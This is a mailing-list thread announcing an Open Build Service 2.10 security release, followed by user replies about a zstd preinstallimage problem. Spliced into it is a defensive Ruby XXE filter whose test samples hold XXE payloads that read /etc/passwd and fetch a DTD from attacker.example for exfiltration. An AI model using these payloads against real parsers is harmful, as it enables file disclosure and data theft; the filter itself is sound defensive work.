Hey People,
This release fixes 4 security problems in 2.10, and you should update your installations as fast as possible.
## Fixed Issues
1. Fix XML external entity (XXE) injection with xmlhash gem (CVE-2022-21949)
One of the Ruby gems we are using to parse XML was susceptible to this kind of attack.
https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Pr...
This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.
2. Fix a privilege escalation issue in ProjectDoProjectReleaseJob.
https://github.com/openSUSE/open-build-service/pull/12407
This has only minor impact as an attacker would have to time job scheduling, which is next to impossible.
3. Fix heap memory corruption in the yajl-ruby gem
For details see https://github.com/brianmario/yajl-ruby/security/advisories/GHSA-jj47-x69x-m...
4. Fix excessive backtracking in the nokogiri gem
For details see https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-crjr-9rc5...
## Ruby 2.7
We have changed the ruby interpreter which requires a manual step when updating from a previous OBS version via packages:
1) Change Passenger to use ruby2.7
edit /etc/apache2/conf.d/mod_passenger.conf:
PassengerRuby "/usr/bin/ruby.ruby2.7"
2) Setup the rake alternative if you have multiple rake versions installed
update-alternatives --set rake /usr/bin/rake.ruby.ruby2.7
3) Restart apache2 service
systemctl restart apache2
## How to Update
Package updates are available from the 2.10 repositories
https://build.opensuse.org/project/show/OBS:Server:2.10
Fixed appliances can be downloaded from
http://openbuildservice.org/download
Henne
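The XXE item above (issue 1) names the attack class but not the mitigation. The following is an added example, not code from OBS or the xmlhash gem: a pre-parse gate that refuses any document declaring a DOCTYPE or ENTITY, which is the mitigation OWASP recommends when an application has no legitimate use for DTDs. The `parse_untrusted_xml` function, the exception class and both sample documents are assumptions constructed for the example; the real parser the gate would hand off to (xmlhash, Nokogiri, ...) is left as a placeholder.

```ruby
# Added example, not part of OBS or the xmlhash gem. A DOCTYPE gate for
# untrusted XML: with no DTD there are no entity declarations, so there is
# nothing for the parser to resolve from file:// or http:// URIs.

# Matches a DOCTYPE or ENTITY declaration. Case-insensitive on purpose: XML
# keywords are case-sensitive, but the check should fail closed.
DOCTYPE_RE = /<!(DOCTYPE|ENTITY)\b/i

# Hypothetical exception type raised when the gate rejects a document.
class UnsafeXml < StandardError; end

# Strip XML comments first so that "<!DOCTYPE" mentioned inside a comment
# does not trigger a false positive. CDATA sections are deliberately not
# exempted: a CDATA block containing "<!DOCTYPE" is rejected, which is the
# safe direction for a gate like this.
def strip_comments(xml)
  xml.gsub(/<!--.*?-->/m, "")
end

# true when the document carries a DOCTYPE or ENTITY declaration.
def xxe_suspect?(xml)
  !!(strip_comments(xml) =~ DOCTYPE_RE)
end

# Gate: raise on suspect input, otherwise return the document unchanged so
# the caller can hand it to the real parser (placeholder; the gem used by
# the application would be called here).
def parse_untrusted_xml(xml)
  raise UnsafeXml, "document declares a DOCTYPE/ENTITY; refusing to parse" if xxe_suspect?(xml)
  xml
end

# Constructed sample inputs (not taken from any real OBS request).
# Classic XXE: an external entity pointing at a local file.
XXE_PAYLOAD = <<~XML
  <?xml version="1.0"?>
  <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
  <project name="home:attacker"><title>&xxe;</title></project>
XML

# Parameter-entity variant used for out-of-band exfiltration; also rejected.
XXE_OOB_PAYLOAD = <<~XML
  <?xml version="1.0"?>
  <!DOCTYPE foo [ <!ENTITY % ext SYSTEM "http://attacker.example/evil.dtd"> %ext; ]>
  <project name="home:attacker"/>
XML

# Benign document; the comment mentioning a DOCTYPE must not trip the gate.
BENIGN_XML = <<~XML
  <?xml version="1.0"?>
  <!-- a comment that mentions <!DOCTYPE must not trip the check -->
  <project name="home:kai"><title>hello &amp; welcome</title></project>
XML

if __FILE__ == $PROGRAM_NAME
  [XXE_PAYLOAD, XXE_OOB_PAYLOAD, BENIGN_XML].each do |doc|
    begin
      parse_untrusted_xml(doc)
      puts "accepted: #{doc.lines[-1].strip}"
    rescue UnsafeXml => e
      puts "rejected: #{e.message}"
    end
  end
end
```

Run the file to see both payloads rejected and the benign document accepted. The gate is a complement to, not a replacement for, disabling entity resolution in the parser itself; if the parser does expose such a switch, turn it off as well so a document that slips past the regex still cannot resolve external entities.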
Hi Henne,
After updating to this version, all my projects no longer use preinstallimage. Is this a known issue, or how can I debug it?
Regards, Kai
On 2022/04/20 Wed 14:12, Henne Vogelsang wrote:
-- Henne Vogelsang http://www.opensuse.org
Everybody has a plan, until they get hit. - Mike Tyson
Hey Kai,
On 26.04.22 15:41, Kai Liu wrote:
There have been some commits on top of 2.10 about zstd compressed preinstall images. Other than that we have no reports about preinstallimage.
Please open an issue on github
https://openbuildservice.org/support/
Henne
On 26.04.22 15:46, Henne Vogelsang wrote:
RTFMailinglist.
https://lists.opensuse.org/archives/list/buildservice@lists.opensuse.org/thr...
On 2022/04/27 Wed 09:57, Stefan Seyfried wrote:
Thanks... didn't link that with the issue I had...
Regards, Kai
https://github.com/openSUSE/open-build-service/commit/cb954ad61a97757fb6c56a...
On 26.04.22 15:41, Kai Liu wrote:
https://lists.opensuse.org/archives/list/buildservice@lists.opensuse.org/thr...
Known.
Workaround on all worker hosts:
rpm -e --nodeps zstd
zypper al zstd
If the workers are running Tumbleweed, check that the "dracut -f" output says something like
dracut: dracut: cannot execute compression command 'zstd -3 -T0 -q', falling back to default
dracut: dracut: using auto-determined compression method 'pigz'
to make sure that the initramfs is still generated.
Then trigger a rebuild of all your preinstallimages.